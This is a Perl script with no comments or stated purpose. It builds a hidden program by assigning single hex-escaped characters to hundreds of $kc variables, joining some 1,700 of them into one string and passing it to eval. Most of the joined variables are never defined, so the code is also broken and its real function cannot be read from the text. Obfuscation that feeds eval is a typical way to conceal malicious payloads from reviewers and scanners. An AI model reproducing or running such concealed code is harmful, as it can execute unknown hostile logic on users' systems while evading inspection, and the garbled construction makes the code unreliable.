$kc909="\x5f";$kc1335="\x3b";$kc281="\x63";$kc248="\x3b";$kc1000="\x6e";$kc272="\x74";$kc1030="\x27";$kc960="\x32";
$kc608="\x64";$kc418="\x20";
$kc1551="\x7a";$kc1384="\x69";
$kc1640="\x61";$kc396="\x20";$kc511="\x20";
$kc860="\x69";
$kc1614="\x0a";$kc1310="\x7b";$kc181="\x20";$kc1116="\x73";$kc646="\x20";
$kc1185="\x20";$kc1495="\x6e";$kc153="\x0a";
$kc905="\x24";$kc1613="\x3b";$kc203="\x40";$kc29="\x6e";$kc239="\x6e";$kc816="\x28";$kc1349="\x3d";$kc1279="\x6a";$kc1624="\x6d";$kc997="\x61";$kc726="\x28";
$kc87="\x76";
$kc7="\x70";$kc899="\x2e";
$kc1427="\x29";
$kc957="\x6e";$kc840="\x24";$kc1248="\x6a";$kc1615="\x6f";$kc99="\x6c";$kc1009="\x3b";
$kc1027="\x24";$kc1658="\x0a";$kc123="\x65";
$kc393="\x75";$kc301="\x65";$kc1169="\x24";$kc1217="\x20";$kc1636="\x61";$kc903="\x5c";
$kc1297="\x20";$kc1663="\x74";
$kc240="\x65";$kc559="\x29";$kc760="\x66";$kc1149="\x6f";
$kc1150="\x72";
$kc480="\x20";$kc1338="\x6d";
$kc1301="\x64";
$kc529="\x65";$kc278="\x61";$kc1605="\x72";$kc1292="\x0a";$kc707="\x2c";
$kc401="\x65";$kc475="\x20";$kc1455="\x7d";$kc1670="\x3b";$kc722="\x20";
$kc925="\x24";$kc1649="\x72";$kc1184="\x3d";$kc332="\x67";$kc1458="\x23";$kc334="\x68";$kc220="\x73";$kc417="\x23";$kc644="\x74";$kc762="\x28";$kc866="\x20";$kc934="\x20";$kc634="\x3c";$kc1525="\x73";
$kc612="\x20";$kc357="\x68";$kc413="\x0a";$kc507="\x63";
$kc1374="\x20";$kc81="\x69";$kc1100="\x75";$kc258="\x64";$kc1156="\x24";$kc442="\x20";$kc420="\x61";
$kc1490="\x79";$kc1603="\x0a";$kc381="\x20";$kc151="\x0a";$kc1269="\x5d";
$kc1579="\x3a";$kc856="\x72";$kc1013="\x0a";$kc814="\x61";
$kc1333="\x2b";$kc39="\x28";$kc1715="\x0a";$kc409="\x3b";$kc211="\x20";$kc1189="\x28";$kc1259="\x24";$kc1529="\x20";$kc1650="\x61";$kc88="\x65";
$kc1360="\x28";$kc656="\x09";$kc871="\x20";$kc541="\x40";$kc131="\x65";$kc221="\x72";$kc1255="\x0a";$kc489="\x6e";$kc750="\x20";$kc570="\x3b";$kc861="\x20";$kc745="\x6d";
$kc593="\x69";$kc116="\x2c";
$kc721="\x2c";$kc161="\x64";$kc231="\x29";$kc1210="\x74";$kc32="\x65";$kc90="\x73";
$kc769="\x28";$kc1503="\x23";$kc1342="\x73";$kc1256="\x09";
$kc927="\x63";$kc543="\x63";
$kc1594="\x72";$kc383="\x69";$kc384="\x2c";$kc900="\x3d";
$kc979="\x09";$kc1245="\x31";
$kc1704="\x0a";$kc1228="\x24";$kc133="\x73";$kc155="\x6d";$kc804="\x6c";$kc1532="\x2c";$kc1146="\x0a";$kc1140="\x20";
$kc625="\x20";$kc765="\x69";$kc588="\x64";$kc1246="\x5b";$kc1383="\x24";$kc916="\x22";$kc350="\x7b";$kc1141="\x3d";$kc1097="\x0a";$kc422="\x64";$kc1409="\x28";$kc1293="\x0a";$kc1093="\x3b";$kc757="\x22";$kc1099="\x73";$kc424="\x6d";$kc386="\x31";$kc347="\x69";$kc314="\x20";$kc363="\x69";$kc1588="\x6d";$kc1352="\x22";$kc1682="\x63";$kc1188="\x74";$kc166="\x73";$kc930="\x65";$kc79="\x61";$kc596="\x28";$kc670="\x69";$kc550="\x5c";$kc616="\x0a";
$kc91="\x69";$kc1699="\x74";$kc988="\x3d";$kc1690="\x2b";$kc849="\x3d";
$kc1253="\x5d";
$kc786="\x29";$kc1406="\x6e";$kc1315="\x20";$kc184="\x0a";$kc1322="\x6e";$kc218="\x0a";$kc1653="\x6f";$kc167="\x68";$kc=$kc0.
$kc1.$kc2.$kc3.$kc4.$kc5.$kc6.
$kc7.$kc8.$kc9.$kc10.$kc11.$kc12.$kc13.$kc14.$kc15.$kc16.$kc17.$kc18.$kc19.
$kc20.$kc21.$kc22.$kc23.$kc24.$kc25.$kc26.$kc27.
$kc28.$kc29.$kc30.
$kc31.
$kc32.$kc33.$kc34.$kc35.$kc36.
$kc37.$kc38.
$kc39.$kc40.$kc41.$kc42.$kc43.$kc44.$kc45.$kc46.$kc47.$kc48.$kc49.$kc50.$kc51.$kc52.$kc53.$kc54.$kc55.
$kc56.$kc57.$kc58.$kc59.$kc60.
$kc61.$kc62.
$kc63.
$kc64.$kc65.$kc66.$kc67.$kc68.$kc69.$kc70.$kc71.$kc72.$kc73.
$kc74.$kc75.
$kc76.$kc77.$kc78.$kc79.$kc80.$kc81.$kc82.$kc83.$kc84.$kc85.$kc86.$kc87.$kc88.$kc89.$kc90.
$kc91.
$kc92.$kc93.$kc94.$kc95.$kc96.$kc97.$kc98.
$kc99.$kc100.$kc101.$kc102.$kc103.$kc104.
$kc105.$kc106.$kc107.$kc108.
$kc109.$kc110.$kc111.$kc112.$kc113.$kc114.$kc115.
$kc116.
$kc117.
$kc118.$kc119.$kc120.$kc121.$kc122.$kc123.$kc124.$kc125.$kc126.
$kc127.$kc128.$kc129.$kc130.$kc131.$kc132.$kc133.$kc134.$kc135.
$kc136.$kc137.
$kc138.
$kc139.$kc140.$kc141.$kc142.$kc143.$kc144.
$kc145.$kc146.$kc147.$kc148.$kc149.$kc150.$kc151.$kc152.
$kc153.$kc154.
$kc155.$kc156.$kc157.$kc158.$kc159.$kc160.$kc161.$kc162.$kc163.$kc164.$kc165.$kc166.$kc167.$kc168.$kc169.$kc170.$kc171.
$kc172.$kc173.$kc174.$kc175.
$kc176.
$kc177.$kc178.$kc179.$kc180.
$kc181.$kc182.$kc183.$kc184.
$kc185.$kc186.$kc187.$kc188.$kc189.$kc190.$kc191.$kc192.
$kc193.$kc194.$kc195.$kc196.$kc197.$kc198.$kc199.$kc200.
$kc201.$kc202.$kc203.$kc204.$kc205.$kc206.$kc207.
$kc208.
$kc209.$kc210.$kc211.$kc212.$kc213.$kc214.$kc215.$kc216.$kc217.$kc218.$kc219.$kc220.$kc221.$kc222.$kc223.$kc224.$kc225.$kc226.$kc227.$kc228.
$kc229.$kc230.$kc231.$kc232.$kc233.$kc234.$kc235.$kc236.$kc237.$kc238.$kc239.$kc240.
$kc241.$kc242.$kc243.$kc244.$kc245.$kc246.
$kc247.$kc248.$kc249.$kc250.$kc251.$kc252.$kc253.$kc254.$kc255.
$kc256.$kc257.$kc258.
$kc259.$kc260.
$kc261.$kc262.$kc263.$kc264.
$kc265.$kc266.
$kc267.
$kc268.
$kc269.$kc270.
$kc271.$kc272.
$kc273.$kc274.
$kc275.$kc276.
$kc277.$kc278.$kc279.$kc280.$kc281.$kc282.$kc283.$kc284.
$kc285.$kc286.
$kc287.$kc288.
$kc289.$kc290.$kc291.$kc292.$kc293.$kc294.$kc295.$kc296.
$kc297.$kc298.$kc299.$kc300.$kc301.$kc302.$kc303.$kc304.
$kc305.$kc306.$kc307.$kc308.$kc309.$kc310.
$kc311.$kc312.$kc313.$kc314.$kc315.$kc316.$kc317.$kc318.
$kc319.$kc320.$kc321.$kc322.$kc323.$kc324.$kc325.$kc326.$kc327.$kc328.$kc329.$kc330.
$kc331.$kc332.$kc333.$kc334.$kc335.$kc336.
$kc337.$kc338.
$kc339.$kc340.$kc341.$kc342.$kc343.$kc344.$kc345.$kc346.$kc347.$kc348.$kc349.$kc350.$kc351.$kc352.$kc353.$kc354.$kc355.$kc356.$kc357.$kc358.$kc359.$kc360.
$kc361.$kc362.$kc363.$kc364.$kc365.$kc366.$kc367.$kc368.$kc369.$kc370.$kc371.$kc372.$kc373.
$kc374.$kc375.$kc376.$kc377.$kc378.$kc379.$kc380.$kc381.$kc382.$kc383.$kc384.
$kc385.$kc386.$kc387.$kc388.$kc389.$kc390.$kc391.$kc392.$kc393.$kc394.$kc395.
$kc396.$kc397.$kc398.$kc399.$kc400.$kc401.$kc402.$kc403.$kc404.$kc405.$kc406.$kc407.
$kc408.
$kc409.$kc410.
$kc411.$kc412.$kc413.$kc414.$kc415.$kc416.$kc417.$kc418.$kc419.$kc420.
$kc421.$kc422.
$kc423.$kc424.$kc425.$kc426.$kc427.$kc428.
$kc429.$kc430.$kc431.$kc432.
$kc433.$kc434.$kc435.
$kc436.$kc437.$kc438.$kc439.$kc440.$kc441.$kc442.
$kc443.$kc444.$kc445.$kc446.$kc447.$kc448.$kc449.$kc450.$kc451.$kc452.$kc453.$kc454.$kc455.$kc456.$kc457.$kc458.$kc459.$kc460.$kc461.$kc462.$kc463.$kc464.$kc465.
$kc466.$kc467.$kc468.
$kc469.$kc470.$kc471.$kc472.
$kc473.$kc474.
$kc475.
$kc476.$kc477.$kc478.$kc479.$kc480.
$kc481.$kc482.$kc483.$kc484.$kc485.$kc486.$kc487.$kc488.$kc489.$kc490.
$kc491.$kc492.$kc493.$kc494.
$kc495.$kc496.$kc497.$kc498.$kc499.$kc500.$kc501.$kc502.$kc503.$kc504.$kc505.$kc506.$kc507.$kc508.$kc509.$kc510.
$kc511.$kc512.
$kc513.$kc514.$kc515.$kc516.
$kc517.$kc518.$kc519.$kc520.
$kc521.$kc522.$kc523.$kc524.
$kc525.$kc526.$kc527.
$kc528.$kc529.$kc530.
$kc531.$kc532.$kc533.$kc534.$kc535.$kc536.
$kc537.$kc538.$kc539.$kc540.$kc541.$kc542.$kc543.$kc544.$kc545.$kc546.$kc547.$kc548.$kc549.$kc550.$kc551.$kc552.
$kc553.$kc554.$kc555.
$kc556.$kc557.$kc558.
$kc559.$kc560.$kc561.$kc562.$kc563.$kc564.$kc565.$kc566.$kc567.$kc568.$kc569.$kc570.$kc571.$kc572.$kc573.$kc574.
$kc575.$kc576.
$kc577.$kc578.$kc579.$kc580.$kc581.$kc582.$kc583.$kc584.$kc585.$kc586.$kc587.$kc588.
$kc589.$kc590.$kc591.$kc592.$kc593.$kc594.
$kc595.$kc596.
$kc597.$kc598.$kc599.$kc600.$kc601.$kc602.$kc603.$kc604.$kc605.$kc606.
$kc607.$kc608.
$kc609.$kc610.$kc611.$kc612.
$kc613.$kc614.
$kc615.$kc616.
$kc617.$kc618.$kc619.$kc620.$kc621.$kc622.$kc623.
$kc624.$kc625.$kc626.$kc627.
$kc628.$kc629.$kc630.
$kc631.$kc632.$kc633.$kc634.$kc635.$kc636.$kc637.$kc638.$kc639.$kc640.
$kc641.$kc642.$kc643.$kc644.$kc645.$kc646.
$kc647.$kc648.$kc649.$kc650.$kc651.$kc652.$kc653.$kc654.$kc655.$kc656.$kc657.$kc658.$kc659.$kc660.
$kc661.$kc662.$kc663.$kc664.$kc665.$kc666.$kc667.$kc668.$kc669.$kc670.$kc671.$kc672.
$kc673.$kc674.$kc675.$kc676.
$kc677.$kc678.$kc679.
$kc680.$kc681.
$kc682.$kc683.$kc684.
$kc685.$kc686.
$kc687.$kc688.$kc689.$kc690.$kc691.$kc692.$kc693.$kc694.$kc695.$kc696.$kc697.
$kc698.$kc699.$kc700.
$kc701.$kc702.$kc703.
$kc704.$kc705.$kc706.$kc707.$kc708.$kc709.$kc710.$kc711.$kc712.$kc713.$kc714.
$kc715.$kc716.$kc717.$kc718.$kc719.$kc720.
$kc721.$kc722.$kc723.$kc724.$kc725.$kc726.$kc727.$kc728.
$kc729.$kc730.$kc731.$kc732.
$kc733.$kc734.
$kc735.
$kc736.$kc737.$kc738.$kc739.$kc740.
$kc741.
$kc742.
$kc743.$kc744.$kc745.
$kc746.$kc747.$kc748.$kc749.$kc750.
$kc751.$kc752.
$kc753.$kc754.$kc755.$kc756.$kc757.$kc758.$kc759.$kc760.$kc761.$kc762.
$kc763.$kc764.$kc765.
$kc766.$kc767.$kc768.
$kc769.$kc770.$kc771.$kc772.$kc773.$kc774.$kc775.$kc776.$kc777.$kc778.$kc779.$kc780.
$kc781.$kc782.$kc783.$kc784.$kc785.$kc786.$kc787.$kc788.$kc789.$kc790.$kc791.$kc792.
$kc793.$kc794.$kc795.
$kc796.$kc797.$kc798.$kc799.$kc800.$kc801.$kc802.$kc803.$kc804.
$kc805.$kc806.$kc807.$kc808.$kc809.$kc810.
$kc811.$kc812.$kc813.$kc814.$kc815.$kc816.
$kc817.$kc818.$kc819.$kc820.$kc821.$kc822.$kc823.$kc824.$kc825.$kc826.$kc827.$kc828.
$kc829.$kc830.$kc831.$kc832.
$kc833.
$kc834.
$kc835.$kc836.
$kc837.$kc838.$kc839.$kc840.
$kc841.$kc842.$kc843.
$kc844.$kc845.$kc846.$kc847.$kc848.$kc849.$kc850.$kc851.$kc852.$kc853.$kc854.$kc855.$kc856.$kc857.$kc858.$kc859.$kc860.
$kc861.$kc862.$kc863.$kc864.$kc865.$kc866.$kc867.$kc868.$kc869.$kc870.$kc871.$kc872.
$kc873.$kc874.
$kc875.$kc876.
$kc877.$kc878.$kc879.$kc880.$kc881.$kc882.$kc883.$kc884.
$kc885.$kc886.$kc887.$kc888.
$kc889.$kc890.$kc891.$kc892.$kc893.$kc894.$kc895.$kc896.$kc897.$kc898.$kc899.
$kc900.$kc901.$kc902.$kc903.$kc904.
$kc905.$kc906.$kc907.$kc908.
$kc909.$kc910.$kc911.$kc912.$kc913.$kc914.$kc915.$kc916.$kc917.$kc918.
$kc919.$kc920.$kc921.$kc922.$kc923.$kc924.
$kc925.$kc926.$kc927.
$kc928.$kc929.$kc930.
$kc931.$kc932.$kc933.$kc934.$kc935.$kc936.$kc937.$kc938.$kc939.$kc940.$kc941.
$kc942.$kc943.$kc944.$kc945.$kc946.$kc947.$kc948.$kc949.$kc950.$kc951.$kc952.
$kc953.$kc954.
$kc955.$kc956.$kc957.$kc958.$kc959.$kc960.$kc961.$kc962.$kc963.$kc964.$kc965.$kc966.
$kc967.$kc968.$kc969.$kc970.$kc971.$kc972.$kc973.$kc974.$kc975.$kc976.$kc977.$kc978.$kc979.$kc980.$kc981.$kc982.$kc983.$kc984.$kc985.$kc986.$kc987.$kc988.$kc989.$kc990.$kc991.
$kc992.$kc993.$kc994.$kc995.$kc996.$kc997.$kc998.$kc999.$kc1000.$kc1001.$kc1002.$kc1003.$kc1004.$kc1005.$kc1006.$kc1007.$kc1008.$kc1009.$kc1010.$kc1011.$kc1012.$kc1013.$kc1014.
$kc1015.$kc1016.$kc1017.
$kc1018.$kc1019.$kc1020.$kc1021.
$kc1022.$kc1023.$kc1024.$kc1025.$kc1026.$kc1027.$kc1028.$kc1029.$kc1030.
$kc1031.$kc1032.$kc1033.$kc1034.$kc1035.$kc1036.
$kc1037.$kc1038.
$kc1039.$kc1040.
$kc1041.$kc1042.$kc1043.$kc1044.
$kc1045.$kc1046.$kc1047.$kc1048.$kc1049.$kc1050.
$kc1051.$kc1052.$kc1053.$kc1054.$kc1055.$kc1056.
$kc1057.$kc1058.$kc1059.$kc1060.$kc1061.$kc1062.
$kc1063.$kc1064.$kc1065.$kc1066.$kc1067.$kc1068.$kc1069.$kc1070.$kc1071.$kc1072.
$kc1073.$kc1074.$kc1075.$kc1076.$kc1077.$kc1078.
$kc1079.
$kc1080.
$kc1081.$kc1082.
$kc1083.$kc1084.
$kc1085.$kc1086.$kc1087.
$kc1088.
$kc1089.$kc1090.
$kc1091.$kc1092.
$kc1093.$kc1094.$kc1095.$kc1096.$kc1097.$kc1098.
$kc1099.$kc1100.$kc1101.$kc1102.$kc1103.$kc1104.$kc1105.$kc1106.$kc1107.$kc1108.$kc1109.$kc1110.$kc1111.$kc1112.$kc1113.$kc1114.$kc1115.
$kc1116.$kc1117.$kc1118.$kc1119.$kc1120.$kc1121.$kc1122.$kc1123.$kc1124.$kc1125.$kc1126.
$kc1127.$kc1128.
$kc1129.$kc1130.$kc1131.
$kc1132.$kc1133.$kc1134.
$kc1135.$kc1136.$kc1137.$kc1138.$kc1139.$kc1140.$kc1141.$kc1142.$kc1143.
$kc1144.
$kc1145.$kc1146.
$kc1147.$kc1148.$kc1149.$kc1150.$kc1151.$kc1152.
$kc1153.$kc1154.$kc1155.$kc1156.$kc1157.$kc1158.$kc1159.$kc1160.
$kc1161.$kc1162.$kc1163.$kc1164.
$kc1165.$kc1166.$kc1167.$kc1168.$kc1169.$kc1170.$kc1171.$kc1172.$kc1173.$kc1174.$kc1175.$kc1176.$kc1177.$kc1178.$kc1179.$kc1180.$kc1181.$kc1182.
$kc1183.$kc1184.
$kc1185.$kc1186.$kc1187.$kc1188.
$kc1189.$kc1190.$kc1191.$kc1192.
$kc1193.$kc1194.$kc1195.$kc1196.$kc1197.$kc1198.$kc1199.$kc1200.$kc1201.$kc1202.$kc1203.$kc1204.$kc1205.$kc1206.
$kc1207.$kc1208.$kc1209.$kc1210.$kc1211.$kc1212.
$kc1213.$kc1214.$kc1215.$kc1216.
$kc1217.
$kc1218.
$kc1219.$kc1220.
$kc1221.$kc1222.$kc1223.$kc1224.
$kc1225.$kc1226.$kc1227.$kc1228.
$kc1229.$kc1230.$kc1231.$kc1232.$kc1233.$kc1234.$kc1235.
$kc1236.$kc1237.$kc1238.
$kc1239.$kc1240.
$kc1241.$kc1242.$kc1243.$kc1244.$kc1245.$kc1246.
$kc1247.$kc1248.$kc1249.$kc1250.$kc1251.$kc1252.$kc1253.$kc1254.$kc1255.
$kc1256.$kc1257.$kc1258.$kc1259.$kc1260.
$kc1261.
$kc1262.$kc1263.$kc1264.$kc1265.$kc1266.$kc1267.$kc1268.$kc1269.$kc1270.$kc1271.$kc1272.$kc1273.$kc1274.$kc1275.$kc1276.$kc1277.$kc1278.$kc1279.$kc1280.$kc1281.$kc1282.$kc1283.$kc1284.$kc1285.$kc1286.$kc1287.$kc1288.
$kc1289.$kc1290.$kc1291.$kc1292.$kc1293.$kc1294.$kc1295.$kc1296.
$kc1297.
$kc1298.$kc1299.
$kc1300.$kc1301.$kc1302.$kc1303.$kc1304.$kc1305.$kc1306.$kc1307.$kc1308.$kc1309.$kc1310.$kc1311.$kc1312.$kc1313.$kc1314.
$kc1315.$kc1316.
$kc1317.$kc1318.$kc1319.
$kc1320.
$kc1321.$kc1322.$kc1323.$kc1324.$kc1325.$kc1326.
$kc1327.$kc1328.$kc1329.$kc1330.$kc1331.$kc1332.$kc1333.$kc1334.
$kc1335.$kc1336.$kc1337.$kc1338.$kc1339.$kc1340.
$kc1341.$kc1342.$kc1343.$kc1344.$kc1345.$kc1346.$kc1347.
$kc1348.$kc1349.$kc1350.
$kc1351.$kc1352.
$kc1353.
$kc1354.$kc1355.
$kc1356.
$kc1357.
$kc1358.$kc1359.$kc1360.$kc1361.$kc1362.$kc1363.$kc1364.$kc1365.$kc1366.
$kc1367.$kc1368.$kc1369.$kc1370.$kc1371.$kc1372.$kc1373.$kc1374.$kc1375.$kc1376.$kc1377.$kc1378.$kc1379.$kc1380.
$kc1381.$kc1382.$kc1383.$kc1384.$kc1385.$kc1386.$kc1387.$kc1388.$kc1389.$kc1390.
$kc1391.$kc1392.$kc1393.$kc1394.$kc1395.
$kc1396.$kc1397.$kc1398.$kc1399.
$kc1400.$kc1401.$kc1402.$kc1403.$kc1404.$kc1405.$kc1406.$kc1407.$kc1408.
$kc1409.$kc1410.$kc1411.$kc1412.$kc1413.$kc1414.$kc1415.
$kc1416.$kc1417.$kc1418.$kc1419.
$kc1420.
$kc1421.$kc1422.
$kc1423.$kc1424.$kc1425.$kc1426.$kc1427.$kc1428.$kc1429.$kc1430.$kc1431.$kc1432.
$kc1433.$kc1434.$kc1435.
$kc1436.$kc1437.$kc1438.$kc1439.$kc1440.
$kc1441.$kc1442.$kc1443.
$kc1444.$kc1445.$kc1446.$kc1447.$kc1448.$kc1449.$kc1450.
$kc1451.$kc1452.
$kc1453.$kc1454.$kc1455.$kc1456.
$kc1457.$kc1458.$kc1459.$kc1460.$kc1461.$kc1462.$kc1463.$kc1464.
$kc1465.$kc1466.
$kc1467.$kc1468.$kc1469.$kc1470.$kc1471.$kc1472.
$kc1473.$kc1474.$kc1475.$kc1476.$kc1477.$kc1478.$kc1479.$kc1480.$kc1481.$kc1482.$kc1483.$kc1484.$kc1485.$kc1486.$kc1487.$kc1488.$kc1489.$kc1490.$kc1491.$kc1492.$kc1493.
$kc1494.$kc1495.$kc1496.
$kc1497.$kc1498.$kc1499.$kc1500.
$kc1501.$kc1502.$kc1503.$kc1504.$kc1505.$kc1506.$kc1507.$kc1508.$kc1509.$kc1510.$kc1511.
$kc1512.
$kc1513.$kc1514.$kc1515.$kc1516.$kc1517.$kc1518.$kc1519.$kc1520.
$kc1521.$kc1522.$kc1523.$kc1524.$kc1525.
$kc1526.
$kc1527.$kc1528.$kc1529.$kc1530.
$kc1531.$kc1532.$kc1533.$kc1534.$kc1535.$kc1536.$kc1537.$kc1538.$kc1539.$kc1540.$kc1541.$kc1542.
$kc1543.$kc1544.$kc1545.$kc1546.$kc1547.
$kc1548.$kc1549.$kc1550.$kc1551.
$kc1552.$kc1553.$kc1554.$kc1555.$kc1556.$kc1557.
$kc1558.$kc1559.$kc1560.
$kc1561.$kc1562.$kc1563.$kc1564.$kc1565.$kc1566.$kc1567.$kc1568.
$kc1569.
$kc1570.$kc1571.$kc1572.
$kc1573.
$kc1574.$kc1575.$kc1576.$kc1577.$kc1578.$kc1579.$kc1580.
$kc1581.$kc1582.$kc1583.$kc1584.
$kc1585.
$kc1586.$kc1587.$kc1588.$kc1589.$kc1590.$kc1591.$kc1592.$kc1593.
$kc1594.$kc1595.
$kc1596.
$kc1597.$kc1598.$kc1599.$kc1600.
$kc1601.$kc1602.
$kc1603.$kc1604.$kc1605.$kc1606.$kc1607.$kc1608.
$kc1609.$kc1610.
$kc1611.$kc1612.$kc1613.$kc1614.$kc1615.$kc1616.$kc1617.
$kc1618.$kc1619.$kc1620.$kc1621.$kc1622.$kc1623.$kc1624.$kc1625.
$kc1626.$kc1627.$kc1628.$kc1629.$kc1630.
$kc1631.$kc1632.$kc1633.$kc1634.
$kc1635.$kc1636.$kc1637.$kc1638.$kc1639.$kc1640.$kc1641.$kc1642.$kc1643.$kc1644.
$kc1645.$kc1646.$kc1647.$kc1648.$kc1649.$kc1650.$kc1651.$kc1652.
$kc1653.
$kc1654.$kc1655.$kc1656.$kc1657.$kc1658.
$kc1659.$kc1660.$kc1661.$kc1662.$kc1663.$kc1664.$kc1665.
$kc1666.$kc1667.$kc1668.$kc1669.$kc1670.$kc1671.$kc1672.
$kc1673.$kc1674.$kc1675.$kc1676.$kc1677.$kc1678.$kc1679.$kc1680.
$kc1681.$kc1682.$kc1683.
$kc1684.$kc1685.$kc1686.$kc1687.$kc1688.$kc1689.$kc1690.$kc1691.$kc1692.$kc1693.$kc1694.$kc1695.$kc1696.$kc1697.$kc1698.
$kc1699.$kc1700.$kc1701.$kc1702.$kc1703.$kc1704.
$kc1705.
$kc1706.$kc1707.$kc1708.$kc1709.$kc1710.
$kc1711.$kc1712.
$kc1713.$kc1714.
$kc1715;$c='kc';eval $kc;